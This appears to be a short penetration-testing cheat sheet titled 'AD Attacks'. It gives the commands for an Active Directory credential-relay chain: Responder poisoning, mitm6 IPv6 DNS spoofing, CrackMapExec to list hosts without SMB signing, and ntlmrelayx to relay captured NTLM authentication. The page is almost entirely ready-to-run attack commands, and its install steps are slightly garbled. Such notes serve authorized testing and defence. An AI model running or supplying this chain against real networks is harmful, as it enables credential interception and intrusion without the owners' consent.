AD Attacks

1 - Running Responder

./Responder.py -I eth0

2 - Mitm6 (run simeltaneous to Responder)

mitm6 -i eth0

3 - CrackMapExec

Install first

sudo add-apt-repository ppa:deadsnakes/ppa 
sudo apt update 
sudo apt install python3.8 python3.8-dev python3.8-venv 
python3.8 -m venv python3.8-venv 
source python3.8-venv/bin/activate 
pip install --upgrade 
pip pip3 install crackmapexec

Run with 1 and 2 to grab Hosts with SMB signing as false:

crackmapexec smb 10.2.55.0/20 --gen-relay-list relay-hosts.txt | grep "False"

4 - Run Mitm6

mitm6 -d evil.corp

5 - Run Ntlmrelayx with Mitm6

Run with 5 together for relays:

ntlmrelayx.py -6 -socks -smb2support -tf relay-hosts.txt

Previousmitm6 NextWeak IKE Security Configurations

Last updated 4 months ago